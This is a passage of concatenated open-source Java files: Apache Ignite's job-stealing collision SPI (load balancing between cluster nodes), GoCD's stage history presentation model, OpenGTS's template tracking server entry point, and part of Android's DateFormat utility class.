                // Remote node does not have attributes - do not steal from it.
                if (!F.isEmpty(stealAttrs) &&
                    (next.attributes() == null || !U.containsAll(next.attributes(), stealAttrs))) {
                    if (log.isDebugEnabled())
                        log.debug("Skip node as it does not have all attributes: " + next.id());

                    continue;
                }

                int delta = 0;

                try {
                    MessageInfo msgInfo = sndMsgMap.get(next.id());

                    if (msgInfo == null) {
                        if (log.isDebugEnabled())
                            log.debug("Failed to find message info for node: " + next.id());

                        // Node left topology or SPI has not received message for it.
                        continue;
                    }

                    Integer waitThreshold = next.attribute(createSpiAttributeName(WAIT_JOBS_THRESHOLD_NODE_ATTR));

                    if (waitThreshold == null) {
                        U.error(log, "Remote node is not configured with GridJobStealingCollisionSpi and " +
                            "jobs will not be stolen from it (you must stop it and update its configuration to use " +
                            "GridJobStealingCollisionSpi): " + next);

                        continue;
                    }

                    delta = next.metrics().getCurrentWaitingJobs() - waitThreshold;

                    if (log.isDebugEnabled())
                        log.debug("Maximum number of jobs to steal from node [jobsToSteal=" + delta +
                            ", node=" + next.id() + ']');

                    // Nothing to steal from this node.
                    if (delta <= 0)
                        continue;

                    synchronized (msgInfo) {
                        if (!msgInfo.expired() && msgInfo.jobsToSteal() > 0) {
                            // Count messages being waited for as present.
                            jobsLeft -= msgInfo.jobsToSteal();

                            continue;
                        }

                        if (jobsLeft < delta)
                            delta = jobsLeft;

                        jobsLeft -= delta;

                        msgInfo.reset(delta);
                    }

                    // Send request to remote node to steal jobs.
                    // Message is a plain integer represented by 'delta'.
                    getSpiContext().send(next, new JobStealingRequest(delta), JOB_STEALING_COMM_TOPIC);
                }
                catch (IgniteSpiException e) {
                    U.error(log, "Failed to send job stealing message to node: " + next, e);

                    // Rollback.
                    jobsLeft += delta;
                }
                finally {
                    // If node is alive, add back to the end of the queue.
                    if (getSpiContext().node(next.id()) != null)
                        nodeQueue.offer(next);
                }
            }
        }
    }

    /** {@inheritDoc} */
    @Override protected List<String> getConsistentAttributeNames() {
        List<String> attrs = new ArrayList<>(2);

        attrs.add(createSpiAttributeName(MAX_STEALING_ATTEMPT_ATTR));
        attrs.add(createSpiAttributeName(MSG_EXPIRE_TIME_ATTR));

        return attrs;
    }

    /** {@inheritDoc} */
    @Override public String toString() {
        return S.toString(JobStealingCollisionSpi.class, this);
    }

    /**
     * Per-node steal message bookkeeping: number of jobs requested/owed and the
     * timestamp of the last update (used for expiration). All access must hold
     * the monitor of this instance.
     */
    private class MessageInfo {
        /** Number of jobs asked to be stolen. */
        private int jobsToSteal;

        /** Timestamp of last reset, used for expiration checks. */
        private long ts = U.currentTimeMillis();

        /**
         * @return Job to steal.
         */
        int jobsToSteal() {
            assert Thread.holdsLock(this);

            return jobsToSteal;
        }

        /**
         * @return {@code True} if message is expired.
         */
        boolean expired() {
            assert Thread.holdsLock(this);

            return jobsToSteal > 0 && U.currentTimeMillis() - ts >= msgExpireTime;
        }

        /**
         * @param jobsToSteal Jobs to steal.
         */
        void reset(int jobsToSteal) {
            assert Thread.holdsLock(this);

            this.jobsToSteal = jobsToSteal;

            ts = U.currentTimeMillis();
        }

        /** {@inheritDoc} */
        @Override public String toString() {
            return S.toString(MessageInfo.class, this);
        }
    }
}
/*************************GO-LICENSE-START*********************************
 * Copyright 2014 ThoughtWorks, Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 *************************GO-LICENSE-END***********************************/

package com.thoughtworks.go.presentation.pipelinehistory;

import com.thoughtworks.go.domain.StageIdentifier;
import com.thoughtworks.go.domain.StageResult;
import com.thoughtworks.go.domain.StageState;
import com.thoughtworks.go.server.presentation.models.StageConfigurationModel;

import java.util.Date;

import static com.thoughtworks.go.util.GoConstants.APPROVAL_SUCCESS;

/**
 * Presentation model for a single stage instance in pipeline history.
 * <p>
 * Equality is based solely on the stage {@code name}. Note that instances
 * created through the no-arg (ibatis) constructor may have a {@code null}
 * name until populated, so {@link #equals(Object)} and {@link #hashCode()}
 * are null-safe.
 */
public class StageInstanceModel implements StageConfigurationModel {
    private String name;
    private long id;
    private JobHistory jobHistory;
    private boolean canRun;
    private boolean scheduled = true; // true if this stage history really happened
    private String approvalType;
    private String approvedBy;
    private String counter;
    private boolean operatePermission;
    private StageInstanceModel previousStage;
    private StageResult result;
    private StageIdentifier identifier;
    private Integer rerunOfCounter;
    private boolean selected;

    // for test
    public StageInstanceModel(String name, String counter, JobHistory jobHistory) {
        this.name = name;
        this.jobHistory = jobHistory;
        this.counter = counter;
    }

    // for test
    public StageInstanceModel(String name, String counter, JobHistory jobHistory, StageIdentifier identifier) {
        this(name, counter, jobHistory);
        this.identifier = identifier;
    }

    public StageInstanceModel(String name, String counter, StageResult result, StageIdentifier identifier) {
        this(name, counter, new JobHistory(), identifier);
        this.result = result;
    }

    // for ibatis; leaves all fields (including name) unset until populated
    public StageInstanceModel() {
    }

    public boolean hasOperatePermission() {
        return operatePermission;
    }

    public void setOperatePermission(boolean operatePermission) {
        this.operatePermission = operatePermission;
    }

    public boolean isSelected() {
        return selected;
    }

    public String getName() {
        return name;
    }

    public void setName(String name) {
        this.name = name;
    }

    public long getId() {
        return id;
    }

    public void setId(long id) {
        this.id = id;
    }

    public JobHistory getBuildHistory() {
        return jobHistory;
    }

    public void setBuildHistory(JobHistory jobHistory) {
        this.jobHistory = jobHistory;
    }

    /** Stage state derived from the states of the jobs in this stage. */
    public StageState getState() {
        return StageState.findByBuilds(jobHistory);
    }

    public String getApprovedBy() {
        return approvedBy;
    }

    public void setApprovedBy(String approvedBy) {
        this.approvedBy = approvedBy;
    }

    /** Human-readable approval status for display. */
    public String getApprovalDescription() {
        if (approvedBy == null) {
            return "Awaiting Approval";
        }
        return "Approved by " + approvedBy;
    }

    public String getApprovalType() {
        return approvalType;
    }

    /** @return {@code "auto"} for success-triggered approval, {@code "manual"} otherwise. */
    public String getApprovalTypeDescription() {
        if (isAutoApproved()) {
            return "auto";
        } else {
            return "manual";
        }
    }

    /** A completed stage that nobody approved still needs approval. */
    public boolean needsApproval() {
        return approvedBy == null && getState().completed();
    }

    public boolean isAutoApproved() {
        return APPROVAL_SUCCESS.equals(approvalType);
    }

    public Date getScheduledDate() {
        return jobHistory.getScheduledDate();
    }

    public boolean getCanRun() {
        return this.canRun;
    }

    public boolean getCanReRun() {
        return canRun;
    }

    /** Cancellation requires operate permission and an active (running) stage. */
    public boolean getCanCancel() {
        return operatePermission && getState().isActive();
    }

    public void setCanRun(boolean canRun) {
        this.canRun = canRun;
    }

    public boolean isScheduled() {
        return scheduled;
    }

    public void setScheduled(boolean value) {
        this.scheduled = value;
    }

    /**
     * Equality is by stage name only. Null-safe: {@code name} may be null
     * when the instance was created via the no-arg (ibatis) constructor and
     * has not been populated yet (the previous implementation threw NPE here).
     */
    @Override
    public boolean equals(Object o) {
        if (this == o) {
            return true;
        }
        if (o == null || getClass() != o.getClass()) {
            return false;
        }

        StageInstanceModel that = (StageInstanceModel) o;

        return name == null ? that.name == null : name.equals(that.name);
    }

    /** Consistent with {@link #equals(Object)}; null-safe on {@code name}. */
    @Override
    public int hashCode() {
        return name == null ? 0 : name.hashCode();
    }

    public void setApprovalType(String approvalType) {
        this.approvalType = approvalType;
    }

    public String getCounter() {
        return counter;
    }

    public void setCounter(String counter) {
        this.counter = counter;
    }

    public void setSelected(boolean selected) {
        this.selected = selected;
    }

    /** A stage can be approved when it can run but has not actually been scheduled. */
    public boolean getCanApprove() {
        return (getCanRun() && !isScheduled());
    }

    /** @return true if any job in this stage completed unsuccessfully. */
    public boolean hasUnsuccessfullyCompleted() {
        for (JobHistoryItem jobHistoryItem : jobHistory) {
            if (jobHistoryItem.hasUnsuccessfullyCompleted()) {
                return true;
            }
        }
        return false;
    }

    /** @return true if every job passed (vacuously true for an empty job history). */
    public boolean hasPassed() {
        for (JobHistoryItem jobHistoryItem : jobHistory) {
            if (!jobHistoryItem.hasPassed()) {
                return false;
            }
        }
        return true;
    }

    /** @return true if any job in this stage is still running. */
    public boolean isRunning() {
        for (JobHistoryItem jobHistoryItem : jobHistory) {
            if (jobHistoryItem.isRunning()) {
                return true;
            }
        }
        return false;
    }

    public boolean hasPreviousStage() {
        return this.previousStage != null;
    }

    public void setPreviousStage(StageInstanceModel previousStage) {
        this.previousStage = previousStage;
    }

    public StageInstanceModel getPreviousStage() {
        return previousStage;
    }

    public StageResult getResult() {
        return result;
    }

    public StageIdentifier getIdentifier() {
        return identifier;
    }

    public String getPipelineName() {
        return identifier.getPipelineName();
    }

    public Integer getPipelineCounter() {
        return identifier.getPipelineCounter();
    }

    public String locator() {
        return identifier.getStageLocator();
    }

    /** @return true if this instance is a rerun of jobs from an earlier stage run. */
    public boolean isRerunJobs() {
        return rerunOfCounter != null;
    }

    public Integer getRerunOfCounter() {
        return rerunOfCounter;
    }

    public void setRerunOfCounter(Integer rerunOfCounter) {
        this.rerunOfCounter = rerunOfCounter;
    }
}
// ---------------------------------------------------------------------------- // Copyright 2007-2013, GeoTelematic Solutions, Inc. // All rights reserved // ---------------------------------------------------------------------------- // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // // ---------------------------------------------------------------------------- // Description: // Main Entry point for a Template example server // ---------------------------------------------------------------------------- // Change History: // 2006/06/30 Martin D. Flynn // -Initial release // 2006/07/27 Martin D. Flynn // -Moved constant information to 'Constants.java' // 2009/08/07 Martin D. Flynn // -Updated to use DCServerConfig // ---------------------------------------------------------------------------- package org.opengts.servers.template; import java.lang.*; import java.util.*; import java.io.*; import org.opengts.util.*; import org.opengts.dbtools.*; import org.opengts.dbtypes.*; import org.opengts.db.*; import org.opengts.db.tables.*; /** *** <code>Main</code> - The main entry point for this device communication server (DCS) *** module. 
**/

/**
 * Command-line entry point for this device communication server (DCS).
 * Responsibilities, in order: initialize the DB layer, load the DCServerConfig,
 * print a startup banner, then either parse a data file ({@code -parseFile}),
 * start the TCP/UDP/command listeners ({@code -start}), or print usage and exit.
 */
public class Main
{

    // ------------------------------------------------------------------------

    /* command-line argument keys (each array lists the accepted aliases for one option) */
    //public static final String ARG_DEVCODE[] = new String[] { "devcode", "dcs" , "serverid" };
    public static final String ARG_PARSEFILE[] = new String[] { "parse"  , "parseFile"   };
    public static final String ARG_HELP[]      = new String[] { "help"   , "h"           };
    //public static final String ARG_TCP_PORT[] = new String[] { "tcp" , "p" , "port" };
    //public static final String ARG_UDP_PORT[] = new String[] { "udp" , "p" , "port" };
    public static final String ARG_CMD_PORT[]  = new String[] { "command", "cmd"         };
    public static final String ARG_START[]     = new String[] { "start"                  };
    public static final String ARG_DEBUG[]     = new String[] { "debug"                  };
    public static final String ARG_FORMAT[]    = new String[] { "format" , "parseFormat" };
    public static final String ARG_INSERT[]    = new String[] { "insert"                 };

    // ------------------------------------------------------------------------
    // ------------------------------------------------------------------------

    /** Name used by DCServerFactory when loading this server's configuration. */
    public static String DCServerFactory_LoadName()
    {
        return Main.getServerContextName();
    }

    /* return server config */
    /** Returns the fixed device-code for this server (see Constants.DEVICE_CODE). */
    public static String getServerName()
    {
        return Constants.DEVICE_CODE;
    }

    /** Returns the runtime context name derived from the server name. */
    public static String getServerContextName()
    {
        return RTConfig.getContextName(Main.getServerName());
    }

    /* return server config */
    // Cached DCServerConfig, loaded on first request.
    private static DCServerConfig dcServerCfg = null;
    /**
     * Returns the (lazily loaded) DCServerConfig for this server, starting remote
     * logging on first load.
     * NOTE(review): the 'dev' parameter is unused here, and the lazy init is not
     * synchronized — presumably this is only called during single-threaded startup;
     * confirm before calling from listener threads.
     */
    public static DCServerConfig getServerConfig(Device dev)
    {
        if (dcServerCfg == null) {
            dcServerCfg = DCServerFactory.getServerConfig(Main.getServerContextName());
            DCServerConfig.startRemoteLogging(dcServerCfg);
        }
        return dcServerCfg;
    }

    // ------------------------------------------------------------------------

    /* get server TCP ports (first check command-line, then config file) */
    // Returns null (after logging an error) if the DCServerConfig could not be loaded.
    public static int[] getTcpPorts()
    {
        DCServerConfig dcs = Main.getServerConfig(null);
        if (dcs != null) {
            return dcs.getTcpPorts();
        } else {
            Print.logError("DCServerConfig not found for server: " + getServerName());
            return null;
        }
    }

    /* get server UDP ports (first check command-line, then config file) */
    // Returns null (after logging an error) if the DCServerConfig could not be loaded.
    public static int[] getUdpPorts()
    {
        DCServerConfig dcs = Main.getServerConfig(null);
        if (dcs != null) {
            return dcs.getUdpPorts();
        } else {
            Print.logError("DCServerConfig not found for server: " + getServerName());
            return null;
        }
    }

    /* get server ports (first check command-line, then config file, then default) */
    // Falls back to the '-command' command-line value (default 0) when no config exists.
    public static int getCommandDispatcherPort()
    {
        DCServerConfig dcs = Main.getServerConfig(null);
        if (dcs != null) {
            return dcs.getCommandDispatcherPort();
        } else {
            return RTConfig.getInt(ARG_CMD_PORT,0);
        }
    }

    // ------------------------------------------------------------------------
    // ------------------------------------------------------------------------
    // Main entry point

    /* display usage and exit */
    // Prints an optional message plus the usage text, then terminates the JVM
    // with exit code 1 (callers rely on this never returning).
    private static void usage(String msg)
    {

        // Default port values shown in the usage text.
        String tcp = StringTools.join(getTcpPorts(),",");
        String udp = StringTools.join(getUdpPorts(),",");
        String cmd = String.valueOf(getCommandDispatcherPort());

        /* print message */
        if (msg != null) {
            Print.logInfo(msg);
        }

        /* print usage */
        String className = Main.class.getName();
        Print.logInfo("");
        Print.logInfo("Usage:");
        Print.logInfo(" java ... " + className + " -h[elp]");
        Print.logInfo(" or");
        Print.logInfo(" java ... " + className + " -parseFile=<filePath>");
        Print.logInfo(" or");
        Print.logInfo(" java ... " + className + " [-port=<port>[,<port>]] -start");
        Print.logInfo("Options:");
        Print.logInfo(" -help This help");
        Print.logInfo(" [-port=<p>[,<p>]] Server TCP/UDP port(s) to listen");
        Print.logInfo(" [-tcp=<p>[,<p>]] Server TCP port(s) to listen on [dft="+tcp+"]");
        Print.logInfo(" [-udp=<p>[,<p>]] Server UDP port(s) to listen on [dft="+udp+"]");
        Print.logInfo(" [-command=<p>] Command port to listen on [dft="+cmd+"]");
        Print.logInfo(" [-dcs=<serverId>] DCServer ID [dft="+Constants.DEVICE_CODE+"]");
        Print.logInfo(" [-format=<parser#>] Parser Format #");
        Print.logInfo(" -start Start server on the specified port.");
        Print.logInfo(" -parseFile=<file> File from which data will be parsed.");
        Print.logInfo("");

        /* exit */
        System.exit(1);

    }

    /* main entry point */
    public static void main(String argv[])
    {

        /* configure server for MySQL data store */
        DBConfig.cmdLineInit(argv,false); // main

        /* device code */
        /* obsolete
        DEVICE_CODE = RTConfig.getString(ARG_DEVCODE, Constants.DEVICE_CODE);
        if (StringTools.isBlank(DEVICE_CODE)) {
            Print.logFatal("Invalid device-code specified");
            Main.usage("");
            System.exit(1);
        }
        */

        /* init configuration constants */
        // NOTE(review): configInit() calls must precede the banner below, which
        // reads the values they establish.
        TrackClientPacketHandler.configInit();
        TrackServer.configInit();
        DCServerConfig dcsc = Main.getServerConfig(null);
        String uniquPfx = (dcsc != null)? StringTools.join(dcsc.getUniquePrefix(),",") : "n/a";

        /* header */
        String SEP = "--------------------------------------------------------------------------";
        Print.logInfo(SEP);
        Print.logInfo(Constants.TITLE_NAME + " Server Version " + Constants.VERSION);
        Print.logInfo("DeviceCode : " + Constants.DEVICE_CODE);
        Print.logInfo("UniqueID Prefix : " + uniquPfx);
        Print.logInfo("ParseFormat : " + TrackClientPacketHandler.DATA_FORMAT_OPTION);
        Print.logInfo("MinimumSpeed : " + TrackClientPacketHandler.MINIMUM_SPEED_KPH);
        Print.logInfo("EstimateOdom : " + TrackClientPacketHandler.ESTIMATE_ODOMETER);
        Print.logInfo("TCP Idle Timeout : " + TrackServer.getTcpIdleTimeout() + " ms");
        Print.logInfo("TCP Packet Timeout : " + TrackServer.getTcpPacketTimeout() + " ms");
        Print.logInfo("TCP Session Timeout : " + TrackServer.getTcpSessionTimeout() + " ms");
        Print.logInfo("UDP Idle Timeout : " + TrackServer.getUdpIdleTimeout() + " ms");
        Print.logInfo("UDP Packet Timeout : " + TrackServer.getUdpPacketTimeout() + " ms");
        Print.logInfo("UDP Session Timeout : " + TrackServer.getUdpSessionTimeout() + " ms");
        Print.logInfo(Constants.COPYRIGHT);
        Print.logInfo(SEP);

        /* explicit help? */
        if (RTConfig.getBoolean(ARG_HELP,false)) {
            Main.usage("Help ...");
            // control doesn't reach here
            System.exit(0);
        }

        /* make sure the DB is properly initialized */
        if (!DBAdmin.verifyTablesExist()) {
            Print.logFatal("MySQL database has not yet been properly initialized");
            System.exit(1);
        }

        /* 'parseFile'? */
        // Offline mode: parse a capture file through the packet handler and exit.
        if (RTConfig.hasProperty(ARG_PARSEFILE)) {
            Print.sysPrintln("Attempting to parse data from file: " + RTConfig.getString(ARG_PARSEFILE));
            RTConfig.setString("parseFile", RTConfig.getString(ARG_PARSEFILE));
            int exit = TrackClientPacketHandler._main(true);
            System.exit(exit);
        }

        /* start server */
        if (RTConfig.getBoolean(ARG_START,false)) {

            /* start port listeners */
            try {
                int tcpPorts[]  = getTcpPorts();
                int udpPorts[]  = getUdpPorts();
                int commandPort = getCommandDispatcherPort();
                TrackServer.startTrackServer(tcpPorts, udpPorts, commandPort);
            } catch (Throwable t) { // trap any server exception
                Print.logError("Error: " + t);
            }

            /* wait here forever while the server is running in a thread */
            // The listeners run in daemon threads; this keeps the JVM alive.
            while (true) { try { Thread.sleep(60L * 60L * 1000L); } catch (Throwable t) {} }
            // control never reaches here

        }

        /* display usage */
        Main.usage("Missing '-start' ...");
        // control doesn't reach here
        System.exit(1);

    }

}
/* * Copyright (C) 2006 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package android.text.format; import android.content.Context; import android.provider.Settings; import android.text.SpannableStringBuilder; import android.text.Spanned; import android.text.SpannedString; import com.android.internal.R; import java.util.Calendar; import java.util.Date; import java.util.GregorianCalendar; import java.util.Locale; import java.util.TimeZone; import java.text.SimpleDateFormat; import libcore.icu.ICU; import libcore.icu.LocaleData; /** * Utility class for producing strings with formatted date/time. * * <p>Most callers should avoid supplying their own format strings to this * class' {@code format} methods and rely on the correctly localized ones * supplied by the system. This class' factory methods return * appropriately-localized {@link java.text.DateFormat} instances, suitable * for both formatting and parsing dates. For the canonical documentation * of format strings, see {@link java.text.SimpleDateFormat}. * * <p>In cases where the system does not provide a suitable pattern, * this class offers the {@link #getBestDateTimePattern} method. * * <p>The {@code format} methods in this class implement a subset of Unicode * <a href="http://www.unicode.org/reports/tr35/#Date_Format_Patterns">UTS #35</a> patterns. * The subset currently supported by this class includes the following format characters: * {@code acdEHhLKkLMmsyz}. 
Up to API level 17, only {@code adEhkMmszy} were supported.
 * Note that this class incorrectly implements {@code k} as if it were {@code H} for backwards
 * compatibility.
 *
 * <p>See {@link java.text.SimpleDateFormat} for more documentation
 * about patterns, or if you need a more complete or correct implementation.
 * Note that the non-{@code format} methods in this class are implemented by
 * {@code SimpleDateFormat}.
 */
public class DateFormat {
    /** @deprecated Use a literal {@code '} instead. */
    @Deprecated
    public static final char QUOTE = '\'';

    /** @deprecated Use a literal {@code 'a'} instead. */
    @Deprecated
    public static final char AM_PM = 'a';

    /** @deprecated Use a literal {@code 'a'} instead; 'A' was always equivalent to 'a'. */
    @Deprecated
    public static final char CAPITAL_AM_PM = 'A';

    /** @deprecated Use a literal {@code 'd'} instead. */
    @Deprecated
    public static final char DATE = 'd';

    /** @deprecated Use a literal {@code 'E'} instead. */
    @Deprecated
    public static final char DAY = 'E';

    /** @deprecated Use a literal {@code 'h'} instead. */
    @Deprecated
    public static final char HOUR = 'h';

    /**
     * @deprecated Use a literal {@code 'H'} (for compatibility with {@link SimpleDateFormat}
     * and Unicode) or {@code 'k'} (for compatibility with Android releases up to and including
     * Jelly Bean MR-1) instead. Note that the two are incompatible.
     */
    @Deprecated
    public static final char HOUR_OF_DAY = 'k';

    /** @deprecated Use a literal {@code 'm'} instead. */
    @Deprecated
    public static final char MINUTE = 'm';

    /** @deprecated Use a literal {@code 'M'} instead. */
    @Deprecated
    public static final char MONTH = 'M';

    /** @deprecated Use a literal {@code 'L'} instead. */
    @Deprecated
    public static final char STANDALONE_MONTH = 'L';

    /** @deprecated Use a literal {@code 's'} instead. */
    @Deprecated
    public static final char SECONDS = 's';

    /** @deprecated Use a literal {@code 'z'} instead. */
    @Deprecated
    public static final char TIME_ZONE = 'z';

    /** @deprecated Use a literal {@code 'y'} instead. */
    @Deprecated
    public static final char YEAR = 'y';

    // Guards the single-entry cache below that memoizes the 12/24-hour decision
    // for the most recently queried locale.
    private static final Object sLocaleLock = new Object();
    private static Locale sIs24HourLocale;
    private static boolean sIs24Hour;

    /**
     * Returns true if user preference is set to 24-hour format.
     * @param context the context to use for the content resolver
     * @return true if 24 hour time format is selected, false otherwise.
     */
    public static boolean is24HourFormat(Context context) {
        String value = Settings.System.getString(context.getContentResolver(),
                Settings.System.TIME_12_24);

        if (value == null) {
            // No explicit user setting: infer from the locale's LONG time pattern,
            // consulting (and then refreshing) the one-locale cache.
            Locale locale = context.getResources().getConfiguration().locale;

            synchronized (sLocaleLock) {
                if (sIs24HourLocale != null && sIs24HourLocale.equals(locale)) {
                    return sIs24Hour;
                }
            }

            java.text.DateFormat natural =
                java.text.DateFormat.getTimeInstance(java.text.DateFormat.LONG, locale);

            if (natural instanceof SimpleDateFormat) {
                SimpleDateFormat sdf = (SimpleDateFormat) natural;
                String pattern = sdf.toPattern();

                // 'H' in the locale's pattern marks it as a 24-hour locale.
                if (pattern.indexOf('H') >= 0) {
                    value = "24";
                } else {
                    value = "12";
                }
            } else {
                value = "12";
            }

            synchronized (sLocaleLock) {
                sIs24HourLocale = locale;
                sIs24Hour = value.equals("24");
            }

            return sIs24Hour;
        }

        return value.equals("24");
    }

    /**
     * Returns the best possible localized form of the given skeleton for the given
     * locale. A skeleton is similar to, and uses the same format characters as, a Unicode
     * <a href="http://www.unicode.org/reports/tr35/#Date_Format_Patterns">UTS #35</a>
     * pattern.
     *
     * <p>One difference is that order is irrelevant. For example, "MMMMd" will return
     * "MMMM d" in the {@code en_US} locale, but "d. MMMM" in the {@code de_CH} locale.
     *
     * <p>Note also in that second example that the necessary punctuation for German was
     * added. For the same input in {@code es_ES}, we'd have even more extra text:
     * "d 'de' MMMM".
     *
     * <p>This method will automatically correct for grammatical necessity. Given the
     * same "MMMMd" input, this method will return "d LLLL" in the {@code fa_IR} locale,
     * where stand-alone months are necessary. Lengths are preserved where meaningful,
     * so "Md" would give a different result to "MMMd", say, except in a locale such as
     * {@code ja_JP} where there is only one length of month.
     *
     * <p>This method will only return patterns that are in CLDR, and is useful whenever
     * you know what elements you want in your format string but don't want to make your
     * code specific to any one locale.
     *
     * @param locale the locale into which the skeleton should be localized
     * @param skeleton a skeleton as described above
     * @return a string pattern suitable for use with {@link java.text.SimpleDateFormat}.
     */
    public static String getBestDateTimePattern(Locale locale, String skeleton) {
        return ICU.getBestDateTimePattern(skeleton, locale.toString());
    }

    /**
     * Returns a {@link java.text.DateFormat} object that can format the time according
     * to the current locale and the user's 12-/24-hour clock preference.
     * @param context the application context
     * @return the {@link java.text.DateFormat} object that properly formats the time.
     */
    public static java.text.DateFormat getTimeFormat(Context context) {
        return new java.text.SimpleDateFormat(getTimeFormatString(context));
    }

    /**
     * Returns a String pattern that can be used to format the time according
     * to the current locale and the user's 12-/24-hour clock preference.
     * @param context the application context
     * @hide
     */
    public static String getTimeFormatString(Context context) {
        LocaleData d = LocaleData.get(context.getResources().getConfiguration().locale);
        return is24HourFormat(context) ? d.timeFormat24 : d.timeFormat12;
    }

    /**
     * Returns a {@link java.text.DateFormat} object that can format the date
     * in short form (such as 12/31/1999) according
     * to the current locale and the user's date-order preference.
     * @param context the application context
     * @return the {@link java.text.DateFormat} object that properly formats the date.
     */
    public static java.text.DateFormat getDateFormat(Context context) {
        String value = Settings.System.getString(context.getContentResolver(),
                Settings.System.DATE_FORMAT);

        return getDateFormatForSetting(context, value);
    }

    /**
     * Returns a {@link java.text.DateFormat} object to format the date
     * as if the date format setting were set to <code>value</code>,
     * including null to use the locale's default format.
     * @param context the application context
     * @param value the date format setting string to interpret for
     *              the current locale
     * @hide
     */
    public static java.text.DateFormat getDateFormatForSetting(Context context,
                                                               String value) {
        String format = getDateFormatStringForSetting(context, value);
        return new java.text.SimpleDateFormat(format);
    }

    // Maps the user's date-order setting (relative positions of 'M', 'd', 'y' in
    // 'value') onto the locale's numeric date template; falls back to the locale
    // default when the setting is absent or lacks any of the three designators.
    private static String getDateFormatStringForSetting(Context context, String value) {
        if (value != null) {
            int month = value.indexOf('M');
            int day = value.indexOf('d');
            int year = value.indexOf('y');

            if (month >= 0 && day >= 0 && year >= 0) {
                String template = context.getString(R.string.numeric_date_template);
                if (year < month && year < day) {
                    if (month < day) {
                        value = String.format(template, "yyyy", "MM", "dd");
                    } else {
                        value = String.format(template, "yyyy", "dd", "MM");
                    }
                } else if (month < day) {
                    if (day < year) {
                        value = String.format(template, "MM", "dd", "yyyy");
                    } else { // unlikely
                        value = String.format(template, "MM", "yyyy", "dd");
                    }
                } else { // day < month
                    if (month < year) {
                        value = String.format(template, "dd", "MM", "yyyy");
                    } else { // unlikely
                        value = String.format(template, "dd", "yyyy", "MM");
                    }
                }

                return value;
            }
        }

        // The setting is not set; use the locale's default.
        LocaleData d = LocaleData.get(context.getResources().getConfiguration().locale);
        return d.shortDateFormat4;
    }

    /**
     * Returns a {@link java.text.DateFormat} object that can format the date
     * in long form (such as {@code Monday, January 3, 2000}) for the current locale.
     * @param context the application context
     * @return the {@link java.text.DateFormat} object that formats the date in long form.
     */
    public static java.text.DateFormat getLongDateFormat(Context context) {
        return java.text.DateFormat.getDateInstance(java.text.DateFormat.LONG);
    }

    /**
     * Returns a {@link java.text.DateFormat} object that can format the date
     * in medium form (such as {@code Jan 3, 2000}) for the current locale.
     * @param context the application context
     * @return the {@link java.text.DateFormat} object that formats the date in long form.
     */
    public static java.text.DateFormat getMediumDateFormat(Context context) {
        return java.text.DateFormat.getDateInstance(java.text.DateFormat.MEDIUM);
    }

    /**
     * Gets the current date format stored as a char array. The array will contain
     * 3 elements ({@link #DATE}, {@link #MONTH}, and {@link #YEAR}) in the order
     * specified by the user's format preference. Note that this order is
     * <i>only</i> appropriate for all-numeric dates; spelled-out (MEDIUM and LONG)
     * dates will generally contain other punctuation, spaces, or words,
     * not just the day, month, and year, and not necessarily in the same
     * order returned here.
     */
    public static char[] getDateFormatOrder(Context context) {
        return ICU.getDateFormatOrder(getDateFormatString(context));
    }

    // Resolves the user's DATE_FORMAT setting (or the locale default) to a pattern string.
    private static String getDateFormatString(Context context) {
        String value = Settings.System.getString(context.getContentResolver(),
                Settings.System.DATE_FORMAT);

        return getDateFormatStringForSetting(context, value);
    }

    /**
     * Given a format string and a time in milliseconds since Jan 1, 1970 GMT, returns a
     * CharSequence containing the requested date.
     * @param inFormat the format string, as described in {@link android.text.format.DateFormat}
     * @param inTimeInMillis in milliseconds since Jan 1, 1970 GMT
     * @return a {@link CharSequence} containing the requested text
     */
    public static CharSequence format(CharSequence inFormat, long inTimeInMillis) {
        return format(inFormat, new Date(inTimeInMillis));
    }

    /**
     * Given a format string and a {@link java.util.Date} object, returns a CharSequence
     * containing the requested date.
     * @param inFormat the format string, as described in {@link android.text.format.DateFormat}
     * @param inDate the date to format
     * @return a {@link CharSequence} containing the requested text
     */
    public static CharSequence format(CharSequence inFormat, Date inDate) {
        Calendar c = new GregorianCalendar();
        c.setTime(inDate);
        return format(inFormat, c);
    }

    /**
     * Indicates whether the specified format string contains seconds.
     *
     * Always returns false if the input format is null.
     *
     * @param inFormat the format string, as described in {@link android.text.format.DateFormat}
     *
     * @return true if the format string contains {@link #SECONDS}, false otherwise
     *
     * @hide
     */
    public static boolean hasSeconds(CharSequence inFormat) {
        return hasDesignator(inFormat, SECONDS);
    }

    /**
     * Test if a format string contains the given designator. Always returns
     * {@code false} if the input format is {@code null}.
     *
     * @hide
     */
    public static boolean hasDesignator(CharSequence inFormat, char designator) {
        if (inFormat == null) return false;

        final int length = inFormat.length();

        int c;
        int count;

        for (int i = 0; i < length; i += count) {
            count = 1;
            c = inFormat.charAt(i);

            if (c == QUOTE) {
                // Skip over quoted literal text so designators inside quotes don't match.
                count = skipQuotedText(inFormat, i, length);
            } else if (c == designator) {
                return true;
            }
        }

        return false;
    }

    // Returns the number of chars consumed by a quoted section starting at 'i'
    // (including the quote characters themselves); "''" counts as a 2-char escape.
    private static int skipQuotedText(CharSequence s, int i, int len) {
        if (i + 1 < len && s.charAt(i + 1) == QUOTE) {
            return 2;
        }

        int count = 1;
        // skip leading quote
        i++;

        while (i < len) {
            char c = s.charAt(i);

            if (c == QUOTE) {
                count++;
                // QUOTEQUOTE -> QUOTE
                if (i + 1 < len && s.charAt(i + 1) == QUOTE) {
                    i++;
                } else {
